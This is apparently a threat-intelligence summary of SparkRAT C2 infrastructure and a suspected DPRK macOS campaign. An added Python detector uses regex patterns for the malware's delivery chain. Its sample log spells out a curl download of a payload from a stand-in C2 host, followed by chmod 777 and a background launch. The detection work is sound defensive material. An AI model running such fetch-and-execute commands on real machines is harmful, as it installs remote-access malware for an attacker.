Unmasking SparkRAT: Detection & macOS Campaign Insights
2025-01-28 • Hunt.io
https://hunt.io/blog/sparkrat-server-detection-macos-activity-and-malicious-connections
Hunt.io identifies additional SparkRAT infrastructure tied to a suspected DPRK macOS campaign previously observed using fake meeting-themed lures. The activity includes open directories serving bash scripts and Mach-O SparkRAT clients, with delivery paths that download client.bin, save it under /Users/shared, set broad execute permissions, and run it in the background. SparkRAT communications rely on WebSocket and HTTP behavior, including default port 8000 panels, Basic Authentication prompts, and update-check responses that can help defenders fingerprint active C2 servers. The investigation lists infrastructure in South Korea and Singapore, including UCLOUD and OVH-hosted IPs, Namecheap-registered domains, Let's Encrypt certificates, and a related Vietnamese-language gaming-themed site used around the same C2 ecosystem.
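The delivery chain summarized above (download into /Users/shared, broad execute permissions, background launch) is a correlation rule rather than a single-event signature. The following is an added example, not code from Hunt.io or the report, that evaluates that rule over a constructed process-execution log; the log format (session id, command line) and the sample hostnames are assumptions.

```python
import re
from collections import defaultdict
# Toy detector for the macOS delivery chain described above: a payload is
# downloaded into /Users/shared, given execute permission for everyone and
# launched in the background. Log format (session id, command line) is assumed.
SHARED_DIR = "/Users/shared/"
# Download stage: curl/wget writing to an explicit output path.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b.*?(?:-o|-O|--output)\s+(\S+)")
# chmod with an octal mode or a symbolic mode that may grant execute to others.
CHMOD_RE = re.compile(r"\bchmod\s+(?:-R\s+)?(\d{3,4}|[ugoa]*\+[rwx]*x[rwx]*)\s+(\S+)")
# Launch stage: a shared-dir binary as the command (or after &&/;/nohup) ending in '&'.
EXEC_RE = re.compile(r"(?:^|&&|;|\|\||\bnohup)\s*(" + re.escape(SHARED_DIR) + r"\S+)\s*&\s*$")

def grants_exec_to_others(mode: str) -> bool:
    """True for modes such as 777, 755, +x, a+x, o+x; False for 750 or u+x."""
    if mode.isdigit():
        return int(mode[-1]) & 1 == 1            # low bit of the 'others' digit
    who = mode.split("+")[0]
    return who == "" or "a" in who or "o" in who

def detect_sparkrat_chain(events):
    """Return [(session, path)] once a session shows download -> chmod -> background exec."""
    stages = defaultdict(dict)                   # session -> {path: set(stages seen)}
    alerts = []
    for session, cmd in events:
        for m in DOWNLOAD_RE.finditer(cmd):
            if m.group(2).startswith(SHARED_DIR):
                stages[session].setdefault(m.group(2), set()).add("download")
        for m in CHMOD_RE.finditer(cmd):
            mode, path = m.groups()
            if path.startswith(SHARED_DIR) and grants_exec_to_others(mode):
                stages[session].setdefault(path, set()).add("chmod")
        m = EXEC_RE.search(cmd)
        if m:
            seen = stages[session].setdefault(m.group(1), set())
            seen.add("exec")
            if {"download", "chmod", "exec"} <= seen:
                alerts.append((session, m.group(1)))
    return alerts

# Constructed sample log, not taken from the report: one malicious chain, one benign session.
SAMPLE_EVENTS = [
    ("s1", "curl -o /Users/shared/client.bin http://c2.example.invalid/client"),
    ("s1", "chmod 777 /Users/shared/client.bin"),
    ("s1", "/Users/shared/client.bin &"),
    ("s2", "curl -o /tmp/report.pdf https://intranet.example.invalid/report.pdf"),
    ("s2", "chmod 644 /tmp/report.pdf"),
]
if __name__ == "__main__":
    print(detect_sparkrat_chain(SAMPLE_EVENTS))  # [('s1', '/Users/shared/client.bin')]
```

The rule only fires when all three stages are seen for the same path in the same session, so a lone download into /Users/shared or a benign chmod does not alert.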
Indicators of Compromise